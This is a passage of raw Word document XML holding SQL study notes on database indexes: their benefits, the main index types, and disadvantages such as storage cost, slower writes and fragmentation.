        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Helps in sorting (ORDER BY) and searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E449B" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="787A2B5C">
          <v:rect id="_x0000_i3022" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AAFA5" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750135C3" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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Indexes take up additional </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disk space</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A787E76" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Slower performance on INSERT, UPDATE, and DELETE operations due to index maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B986231" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="01DE5380">
          <v:rect id="_x0000_i3023" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFBA5CC" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🏷️</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Types of Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24148590" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Primary Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Automatically created on the primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254A1EE" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Ensures that indexed column(s) have unique values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4FF47" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Composite Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Created on two or more columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D521C23" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Sorts the actual data rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E4049" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Non-clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Has a separate structure that points to the data rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D8209" w14:textId="6CB36B71"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574427B0">
          <v:rect id="_x0000_i3024" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="799797AC" w14:textId="53B7D78A" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="735" w:name="_Toc196308215"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the disadvantages of Index</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="735"/>
    </w:p>
    <w:p w14:paraId="557E970A" w14:textId="2812A93F" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disadvantages of indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74754B2C" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="691C9B61">
          <v:rect id="_x0000_i3025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1D071" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disadvantages of Indexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563669D3" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Increased Disk Space Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00869747" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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 xml:space="preserve">Indexes consume </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>additional storage</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the database, especially if multiple indexes are created on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666272E" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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lower Write Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9E5E1" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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 xml:space="preserve">INSERT, UPDATE, and DELETE operations become </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the indexes also need to be updated each time the data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4C9B2" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maintenance Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA8D27" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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 xml:space="preserve">Frequent changes in indexed columns can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fragmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, requiring </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index rebuilding</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reorganization</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35E2B1" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Too Many Indexes Can Hurt Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64466BC0" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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 xml:space="preserve">Having too many indexes can cause the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query optimizer</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to choose a suboptimal index, affecting performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0A194" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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 xml:space="preserve">Also increases </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complexity in tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39639C22" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Not Useful for Small Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D699773" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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 xml:space="preserve">For small tables, a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full table scan</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is often faster than using an index due to minimal I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3DB1D" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Indexes Are Not Always Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59B430" w14:textId="77777777" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">If queries don’t match the indexed columns properly, indexes are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ignored</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
